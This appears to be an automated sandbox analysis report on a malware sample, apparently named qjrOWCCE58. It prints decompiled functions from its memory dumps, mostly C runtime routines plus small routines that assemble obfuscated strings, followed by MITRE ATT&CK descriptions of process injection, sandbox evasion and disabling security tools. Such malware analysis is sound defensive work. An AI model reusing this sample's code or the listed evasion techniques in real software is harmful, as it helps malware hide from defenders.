MOC, xrefs: 00830F4A
RCC, xrefs: 00830F52

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 303833b43aea1f4179fef7c5366d32006cd1626733a0f2a177099824f101065e
Instruction ID: f3a6b53185a4824c005379e68c2fa545b6663a0dd7ca43b7a31d12469e632a4b
Opcode Fuzzy Hash: 303833b43aea1f4179fef7c5366d32006cd1626733a0f2a177099824f101065e
Instruction Fuzzy Hash: 8941A971900209AFCF25DF98CC95AEEBBB5FF88300F188059F904A7261D735A9A1DF91

Uniqueness

Uniqueness Score: -1.00%

Function 004037F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E004037F0(intOrPtr _a4) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				char _v48;
				void* __ecx;
				void* __ebp;
				signed int _t34;
				signed int _t42;
				void* _t52;
				intOrPtr _t61;
				intOrPtr _t68;
				intOrPtr _t69;
				signed int _t74;
				void* _t75;

				_push(0xffffffff);
				_push(0x42abdf);
				_push( *[fs:0x0]);
				_push(_t61);
				_t34 =  *0x43b054; // 0x41d6575c
				_push(_t34 ^ _t72);
				 *[fs:0x0] =  &_v16;
				_t68 = _t61;
				_v20 = _t68;
				E0040C893(_t61, 0);
				_v8 = 0;
				 *((intOrPtr*)(_t68 + 4)) = 0;
				 *((char*)(_t68 + 8)) = 0;
				 *((intOrPtr*)(_t68 + 0xc)) = 0;
				 *((char*)(_t68 + 0x10)) = 0;
				 *((intOrPtr*)(_t68 + 0x14)) = 0;
				 *((short*)(_t68 + 0x18)) = 0;
				 *((intOrPtr*)(_t68 + 0x1c)) = 0;
				 *((short*)(_t68 + 0x20)) = 0;
				 *((intOrPtr*)(_t68 + 0x24)) = 0;
				 *((char*)(_t68 + 0x28)) = 0;
				 *((intOrPtr*)(_t68 + 0x2c)) = 0;
				 *((char*)(_t68 + 0x30)) = 0;
				_t39 = _a4;
				_v8 = 6;
				if(_a4 == 0) {
					E0040C846("bad locale name");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0xffffffff);
					_push(0x42ac00);
					_push( *[fs:0x0]);
					_push(_t68);
					_t42 =  *0x43b054; // 0x41d6575c
					_push(_t42 ^ _t74);
					 *[fs:0x0] =  &_v48;
					_t69 = _t61;
					E0040CBC1(_t61, _t69);
					_t46 =  *((intOrPtr*)(_t69 + 0x2c));
					_t75 = _t74 + 4;
					if( *((intOrPtr*)(_t69 + 0x2c)) != 0) {
						E00414748(_t46);
						_t75 = _t75 + 4;
					}
					 *((intOrPtr*)(_t69 + 0x2c)) = 0;
					_t47 =  *((intOrPtr*)(_t69 + 0x24));
					if( *((intOrPtr*)(_t69 + 0x24)) != 0) {
						E00414748(_t47);
						_t75 = _t75 + 4;
					}
					 *((intOrPtr*)(_t69 + 0x24)) = 0;
					_t48 =  *((intOrPtr*)(_t69 + 0x1c));
					if( *((intOrPtr*)(_t69 + 0x1c)) != 0) {
						E00414748(_t48);
						_t75 = _t75 + 4;
					}
					 *((intOrPtr*)(_t69 + 0x1c)) = 0;
					_t49 =  *((intOrPtr*)(_t69 + 0x14));
					if( *((intOrPtr*)(_t69 + 0x14)) != 0) {
						E00414748(_t49);
						_t75 = _t75 + 4;
					}
					 *((intOrPtr*)(_t69 + 0x14)) = 0;
					_t50 =  *((intOrPtr*)(_t69 + 0xc));
					if( *((intOrPtr*)(_t69 + 0xc)) != 0) {
						E00414748(_t50);
						_t75 = _t75 + 4;
					}
					 *((intOrPtr*)(_t69 + 0xc)) = 0;
					_t51 =  *((intOrPtr*)(_t69 + 4));
					if( *((intOrPtr*)(_t69 + 4)) != 0) {
						E00414748(_t51);
					}
					 *((intOrPtr*)(_t69 + 4)) = 0;
					_t52 = E0040C8EB(_t69);
					 *[fs:0x0] = _v20;
					return _t52;
				} else {
					E0040CB76(_t61, _t68, _t39);
					 *[fs:0x0] = _v16;
					return _t68;
				}
			}

0x004037f3
0x004037f5
0x00403800
0x00403801
0x00403803
0x0040380a
0x0040380e
0x00403814
0x00403816
0x0040381b
0x00403820
0x00403827
0x0040382e
0x00403832
0x00403839
0x0040383f
0x00403846
0x0040384a
0x0040384d
0x00403851
0x00403854
0x00403857
0x0040385a
0x0040385d
0x00403860
0x00403866
0x0040388b
0x00403890
0x00403891
0x00403892
0x00403893
0x00403894
0x00403895
0x00403896
0x00403897
0x00403898
0x00403899
0x0040389a
0x0040389b
0x0040389c
0x0040389d
0x0040389e
0x0040389f
0x004038a3
0x004038a5
0x004038b0
0x004038b1
0x004038b2
0x004038b9
0x004038bd
0x004038c3
0x004038c6
0x004038cb
0x004038ce
0x004038d3
0x004038d6
0x004038db
0x004038db
0x004038de
0x004038e5
0x004038ea
0x004038ed
0x004038f2
0x004038f2
0x004038f5
0x004038fc
0x00403901
0x00403904
0x00403909
0x00403909
0x0040390c
0x00403913
0x00403918
0x0040391b
0x00403920
0x00403920
0x00403923
0x0040392a
0x0040392f
0x00403932
0x00403937
0x00403937
0x0040393a
0x00403941
0x00403946
0x00403949
0x0040394e
0x00403953
0x0040395a
0x00403962
0x0040396e
0x00403868
0x0040386a
0x00403877
0x00403883
0x00403883

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040381B
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040386A

Part of subcall function 0040CB76: _Yarn.LIBCPMT ref: 0040CB95
Part of subcall function 0040CB76: _Yarn.LIBCPMT ref: 0040CBB9

Strings

bad locale name, xrefs: 00403886

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: 3ada4bbd44a920d1023e5a6366f4fd58ab57b9a21ee3eb5d772ca66f97bd4898
Instruction ID: 8d9d61529bc2c55ab1559703c109e482579dd515c3a670aea5a7718bb6c271ef
Opcode Fuzzy Hash: 3ada4bbd44a920d1023e5a6366f4fd58ab57b9a21ee3eb5d772ca66f97bd4898
Instruction Fuzzy Hash: 7B116D71908B449ED320CF69C841747BBE8EB19714F008A6EE89993B80E779A5048B99

Uniqueness

Uniqueness Score: -1.00%

Function 00827CD7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON

Download Yara Rule

APIs

Part of subcall function 0082D99F: RtlEnterCriticalSection.NTDLL(0043C4FC), ref: 0082D9AA
Part of subcall function 0082D99F: RtlLeaveCriticalSection.NTDLL(0043C4FC), ref: 0082D9E7

__Init_thread_footer.LIBCMT ref: 00827D57

Part of subcall function 0082D955: RtlEnterCriticalSection.NTDLL(0043C4FC), ref: 0082D95F
Part of subcall function 0082D955: RtlLeaveCriticalSection.NTDLL(0043C4FC), ref: 0082D992

Strings

F^, xrefs: 00827CF7
A@, xrefs: 00827CEE

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer
String ID: A@$F^
API String ID: 4132704954-756130965
Opcode ID: 6e5e117fd2f924b249ee2397dc8784dabf87cb833099acb23f33f36cf38d1dca
Instruction ID: 65a0e4823005cfca612a4be3e68623b4a8603d0816e32af9deed370dc3390b8a
Opcode Fuzzy Hash: 6e5e117fd2f924b249ee2397dc8784dabf87cb833099acb23f33f36cf38d1dca
Instruction Fuzzy Hash: BD017575A00358DBC700DFA8A9C2658B7B1FB19700F50A175E914AB3A2E7349980DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00407C50 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00407C50(void* __edx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* __ebx;
				signed int _t8;
				intOrPtr _t11;
				void* _t22;
				void* _t23;
				void* _t24;
				signed int _t25;

				_t24 = __esi;
				_t23 = __edi;
				_t22 = __edx;
				_t8 =  *0x43b054; // 0x41d6575c
				_v8 = _t8 ^ _t25;
				_v24 = 0x4b426d72;
				_v20 = 0x5c4b404f;
				_t19 =  *((intOrPtr*)( *[fs:0x2c]));
				_t11 =  *0x43cec8; // 0x0
				_v16 = 0x4b564b00;
				if(_t11 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
					E0040D738(_t11, 0x43cec8);
					_t30 =  *0x43cec8 - 0xffffffff;
					if( *0x43cec8 == 0xffffffff) {
						asm("movq xmm0, [ebp-0x14]");
						asm("movq [0x43cf4c], xmm0");
						 *0x43cf54 = _v16;
						 *0x43cf58 = 0x2e;
						E0040DA4A(_t19, _t30, 0x42b610);
						E0040D6EE(0x43cec8);
					}
				}
				return E0040D3AF(0x43cf4c, 0x2e, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x00407c50
0x00407c50
0x00407c50
0x00407c56
0x00407c5d
0x00407c67
0x00407c70
0x00407c77
0x00407c79
0x00407c7e
0x00407c8b
0x00407c92
0x00407c9a
0x00407ca1
0x00407ca3
0x00407cb0
0x00407cb8
0x00407cbd
0x00407cc3
0x00407ccd
0x00407cd2
0x00407ca1
0x00407ce8

APIs

Part of subcall function 0040D738: EnterCriticalSection.KERNEL32(0043C4FC,?,?,?,0040489A,0043CE9C,?,41D6575C,00000000,?), ref: 0040D743
Part of subcall function 0040D738: LeaveCriticalSection.KERNEL32(0043C4FC,?,0040489A,0043CE9C,?,41D6575C,00000000,?), ref: 0040D780

__Init_thread_footer.LIBCMT ref: 00407CCD

Part of subcall function 0040D6EE: EnterCriticalSection.KERNEL32(0043C4FC,?,?,004048CD,0043CE9C), ref: 0040D6F8
Part of subcall function 0040D6EE: LeaveCriticalSection.KERNEL32(0043C4FC,?,004048CD,0043CE9C), ref: 0040D72B
Part of subcall function 0040D6EE: RtlWakeAllConditionVariable.NTDLL ref: 0040D7A2

Strings

O@K\, xrefs: 00407C70
rmBK, xrefs: 00407C67

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
String ID: O@K\$rmBK
API String ID: 2296764815-1707540389
Opcode ID: 0b4e3bddff39e2a8b61181dacca8bca262ad1ab926c983307518f328232aae36
Instruction ID: 6ba95d8cbd0826ce49706c00c29ad6637553a114c0c131d48f39b2d8803ed8f0
Opcode Fuzzy Hash: 0b4e3bddff39e2a8b61181dacca8bca262ad1ab926c983307518f328232aae36
Instruction Fuzzy Hash: E201D472E046088BCB10EFADE98265DB7B0EB49310F20657AE516773D1DB3959048F5A

Uniqueness

Uniqueness Score: -1.00%

Function 00407E90 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00407E90(void* __edx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* __ebx;
				signed int _t8;
				intOrPtr _t11;
				void* _t22;
				void* _t23;
				void* _t24;
				signed int _t25;

				_t24 = __esi;
				_t23 = __edi;
				_t22 = __edx;
				_t8 =  *0x43b054; // 0x41d6575c
				_v8 = _t8 ^ _t25;
				_v24 = 0x4b426d72;
				_v20 = 0x5c4b404f;
				_t19 =  *((intOrPtr*)( *[fs:0x2c]));
				_t11 =  *0x43ce1c; // 0x0
				_v16 = 0x45404200;
				if(_t11 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
					E0040D738(_t11, 0x43ce1c);
					_t30 =  *0x43ce1c - 0xffffffff;
					if( *0x43ce1c == 0xffffffff) {
						asm("movq xmm0, [ebp-0x14]");
						asm("movq [0x43cd98], xmm0");
						 *0x43cda0 = _v16;
						 *0x43cda4 = 0x2e;
						E0040DA4A(_t19, _t30, 0x42b590);
						E0040D6EE(0x43ce1c);
					}
				}
				return E0040D3AF(0x43cd98, 0x2e, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x00407e90
0x00407e90
0x00407e90
0x00407e96
0x00407e9d
0x00407ea7
0x00407eb0
0x00407eb7
0x00407eb9
0x00407ebe
0x00407ecb
0x00407ed2
0x00407eda
0x00407ee1
0x00407ee3
0x00407ef0
0x00407ef8
0x00407efd
0x00407f03
0x00407f0d
0x00407f12
0x00407ee1
0x00407f28

APIs

Part of subcall function 0040D738: EnterCriticalSection.KERNEL32(0043C4FC,?,?,?,0040489A,0043CE9C,?,41D6575C,00000000,?), ref: 0040D743
Part of subcall function 0040D738: LeaveCriticalSection.KERNEL32(0043C4FC,?,0040489A,0043CE9C,?,41D6575C,00000000,?), ref: 0040D780

__Init_thread_footer.LIBCMT ref: 00407F0D

Part of subcall function 0040D6EE: EnterCriticalSection.KERNEL32(0043C4FC,?,?,004048CD,0043CE9C), ref: 0040D6F8
Part of subcall function 0040D6EE: LeaveCriticalSection.KERNEL32(0043C4FC,?,004048CD,0043CE9C), ref: 0040D72B
Part of subcall function 0040D6EE: RtlWakeAllConditionVariable.NTDLL ref: 0040D7A2

Strings

O@K\, xrefs: 00407EB0
rmBK, xrefs: 00407EA7

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
String ID: O@K\$rmBK
API String ID: 2296764815-1707540389
Opcode ID: 74c30a56bd1d6f688a4f0af73a9ab7780151f366150e951f2cc9e96ce239a277
Instruction ID: 5a8fedadc6c1b7e33ae884c46ffaa7b4308287e968ac58c6bf641ed7e6a6e22e
Opcode Fuzzy Hash: 74c30a56bd1d6f688a4f0af73a9ab7780151f366150e951f2cc9e96ce239a277
Instruction Fuzzy Hash: FA01D475E002089BCB00DFA9EC8365EB7B0EB89704F10157AF425B7392D739A9148B5A

Uniqueness

Uniqueness Score: -1.00%

Function 008280F7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 0082D99F: RtlEnterCriticalSection.NTDLL(0043C4FC), ref: 0082D9AA
Part of subcall function 0082D99F: RtlLeaveCriticalSection.NTDLL(0043C4FC), ref: 0082D9E7

__Init_thread_footer.LIBCMT ref: 00828174

Part of subcall function 0082D955: RtlEnterCriticalSection.NTDLL(0043C4FC), ref: 0082D95F
Part of subcall function 0082D955: RtlLeaveCriticalSection.NTDLL(0043C4FC), ref: 0082D992

Strings

O@K\, xrefs: 00828117
rmBK, xrefs: 0082810E

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer
String ID: O@K\$rmBK
API String ID: 4132704954-1707540389
Opcode ID: a14886dfc7505f3b5ffd807cec361dc9fa085d1e2b3ff2e2a8ee1a98be9065d6
Instruction ID: 984423dcacbb5dde6298e46945ed47b54d7e6aac024177f189e41287a7e137e4
Opcode Fuzzy Hash: a14886dfc7505f3b5ffd807cec361dc9fa085d1e2b3ff2e2a8ee1a98be9065d6
Instruction Fuzzy Hash: 0B01B574A002189BCB00DFA8FD8265DBBB0FB09700F102179E425EB352D7349950CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00827EB7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 0082D99F: RtlEnterCriticalSection.NTDLL(0043C4FC), ref: 0082D9AA
Part of subcall function 0082D99F: RtlLeaveCriticalSection.NTDLL(0043C4FC), ref: 0082D9E7

__Init_thread_footer.LIBCMT ref: 00827F34

Part of subcall function 0082D955: RtlEnterCriticalSection.NTDLL(0043C4FC), ref: 0082D95F
Part of subcall function 0082D955: RtlLeaveCriticalSection.NTDLL(0043C4FC), ref: 0082D992

Strings

rmBK, xrefs: 00827ECE
O@K\, xrefs: 00827ED7

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer
String ID: O@K\$rmBK
API String ID: 4132704954-1707540389
Opcode ID: 18a61e2daa8abf2f81f6553eeca9127f7f6177bd7a1d3725d27f1bacef8a8acf
Instruction ID: e2cf8b1aaacd00a8b854e8735fd2ac71175290e0e2cc03de9342e7bce6fde9b2
Opcode Fuzzy Hash: 18a61e2daa8abf2f81f6553eeca9127f7f6177bd7a1d3725d27f1bacef8a8acf
Instruction Fuzzy Hash: 2601D872A043488BCB10DFACFEC265DBBB0F719300F106565E515B7392D7349980CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00407DF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00407DF0(void* __ebx, void* __edx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _t8;
				intOrPtr _t11;
				void* _t18;
				void* _t22;
				void* _t23;
				void* _t24;
				signed int _t25;

				_t24 = __esi;
				_t23 = __edi;
				_t22 = __edx;
				_t18 = __ebx;
				_t8 =  *0x43b054; // 0x41d6575c
				_v8 = _t8 ^ _t25;
				_v20 = 0x721c1d43;
				_v16 = 0x4a434d;
				_v12 = 0x2e4b564b;
				_t19 =  *((intOrPtr*)( *[fs:0x2c]));
				_t11 =  *0x43cd50; // 0x0
				if(_t11 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
					E0040D738(_t11, 0x43cd50);
					_t30 =  *0x43cd50 - 0xffffffff;
					if( *0x43cd50 == 0xffffffff) {
						asm("movaps xmm0, [0x437d90]");
						asm("movups [0x43cf2c], xmm0");
						asm("movq xmm0, [ebp-0x10]");
						asm("movq [0x43cf3c], xmm0");
						 *0x43cf44 = _v12;
						E0040DA4A(_t19, _t30, 0x42b5b0);
						E0040D6EE(0x43cd50);
					}
				}
				return E0040D3AF(0x43cf2c, _t18, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x00407df0
0x00407df0
0x00407df0
0x00407df0
0x00407df6
0x00407dfd
0x00407e06
0x00407e0d
0x00407e14
0x00407e1b
0x00407e1d
0x00407e28
0x00407e2f
0x00407e37
0x00407e3e
0x00407e40
0x00407e4a
0x00407e56
0x00407e5b
0x00407e63
0x00407e68
0x00407e72
0x00407e77
0x00407e3e
0x00407e8c

APIs

Part of subcall function 0040D738: EnterCriticalSection.KERNEL32(0043C4FC,?,?,?,0040489A,0043CE9C,?,41D6575C,00000000,?), ref: 0040D743
Part of subcall function 0040D738: LeaveCriticalSection.KERNEL32(0043C4FC,?,0040489A,0043CE9C,?,41D6575C,00000000,?), ref: 0040D780

__Init_thread_footer.LIBCMT ref: 00407E72

Part of subcall function 0040D6EE: EnterCriticalSection.KERNEL32(0043C4FC,?,?,004048CD,0043CE9C), ref: 0040D6F8
Part of subcall function 0040D6EE: LeaveCriticalSection.KERNEL32(0043C4FC,?,004048CD,0043CE9C), ref: 0040D72B
Part of subcall function 0040D6EE: RtlWakeAllConditionVariable.NTDLL ref: 0040D7A2

Strings

MCJ, xrefs: 00407E0D
KVK., xrefs: 00407E14

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
String ID: KVK.$MCJ
API String ID: 2296764815-1357980711
Opcode ID: c226f849c1f2a4dedc743aeb0a3e569d3293e0b43dfabb96271b9170a83d09d9
Instruction ID: 8c3ea7ea8fb6bb5fb4e9e4225e6a3987d6af839588a84af3a08340b6f112bd1b
Opcode Fuzzy Hash: c226f849c1f2a4dedc743aeb0a3e569d3293e0b43dfabb96271b9170a83d09d9
Instruction Fuzzy Hash: 32017570E00608DBCB10DFA9ED816AD7770FB69304F10A27AF915773A1EB3969448F89

Uniqueness

Uniqueness Score: -1.00%

Function 00828057 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 0082D99F: RtlEnterCriticalSection.NTDLL(0043C4FC), ref: 0082D9AA
Part of subcall function 0082D99F: RtlLeaveCriticalSection.NTDLL(0043C4FC), ref: 0082D9E7

__Init_thread_footer.LIBCMT ref: 008280D9

Part of subcall function 0082D955: RtlEnterCriticalSection.NTDLL(0043C4FC), ref: 0082D95F
Part of subcall function 0082D955: RtlLeaveCriticalSection.NTDLL(0043C4FC), ref: 0082D992

Strings

MCJ, xrefs: 00828074
KVK., xrefs: 008280AE

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer
String ID: KVK.$MCJ
API String ID: 4132704954-1357980711
Opcode ID: 50bb87e2a6839c134c2898552212750638e3517421861cf63afe9ba383826146
Instruction ID: f090250bde9929f34d9a0e10542491ecf98b85fe38e1bc1f50cd26b6eaa483bb
Opcode Fuzzy Hash: 50bb87e2a6839c134c2898552212750638e3517421861cf63afe9ba383826146
Instruction Fuzzy Hash: 02015674E00718D7CB10DFA8F98169D7B70FB19304F106275E915A73A1EB7569848F89

Uniqueness

Uniqueness Score: -1.00%

Function 00403670 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00403670(intOrPtr* __ecx, intOrPtr _a4) {
				intOrPtr* _t16;
				intOrPtr _t18;

				_t18 = _a4;
				asm("xorps xmm0, xmm0");
				_t16 = __ecx;
				 *__ecx = 0x42c2d4;
				asm("movq [eax], xmm0");
				E0040E761(_t18 + 4, __ecx + 4);
				 *_t16 = 0x437c8c;
				 *((intOrPtr*)(_t16 + 0xc)) =  *((intOrPtr*)(_t18 + 0xc));
				 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t18 + 0x10));
				 *_t16 = 0x437cf8;
				return _t16;
			}

0x00403674
0x00403677
0x0040367b
0x00403681
0x00403687
0x0040368f
0x00403694
0x004036a3
0x004036a8
0x004036ab
0x004036b4

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0040368F

Strings

@6@, xrefs: 00403694
@6@, xrefs: 004036AB

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: @6@$@6@
API String ID: 2659868963-4089279410
Opcode ID: dbec464a7577ee9f97fd120d407b21fa858485c297749ebda3fceacfccaeb0a7
Instruction ID: ecb14f09b00ba5ec411817cfc26bda9b12e154c0a31942dae1a2370791c8b13a
Opcode Fuzzy Hash: dbec464a7577ee9f97fd120d407b21fa858485c297749ebda3fceacfccaeb0a7
Instruction Fuzzy Hash: 7EF030B6A10709ABC310DF59D840882F7ECFF59310750C62BE519D7700E774B464CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00423310 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00423310() {

				 *0x43ccd8 = GetCommandLineA();
				 *0x43ccdc = GetCommandLineW();
				return 1;
			}

0x00423316
0x00423321
0x00423328

APIs

GetCommandLineA.KERNEL32 ref: 00423310
GetCommandLineW.KERNEL32 ref: 0042331B

Strings

p3U, xrefs: 00423316

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: CommandLine
String ID: p3U
API String ID: 3253501508-1155166473
Opcode ID: 9de3c9eb5f57784141961e09a620669d83677b33c388c5fcbc6f3be29e91b482
Instruction ID: dadfae623ef17e416a4a50b68767d85d3b552e733b805bfab8c4fd418d34a116
Opcode Fuzzy Hash: 9de3c9eb5f57784141961e09a620669d83677b33c388c5fcbc6f3be29e91b482
Instruction Fuzzy Hash: C6B09278980240CFC7108FB4B8CC1083BA2F2082023C03075D409D2370DA340002EF48

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
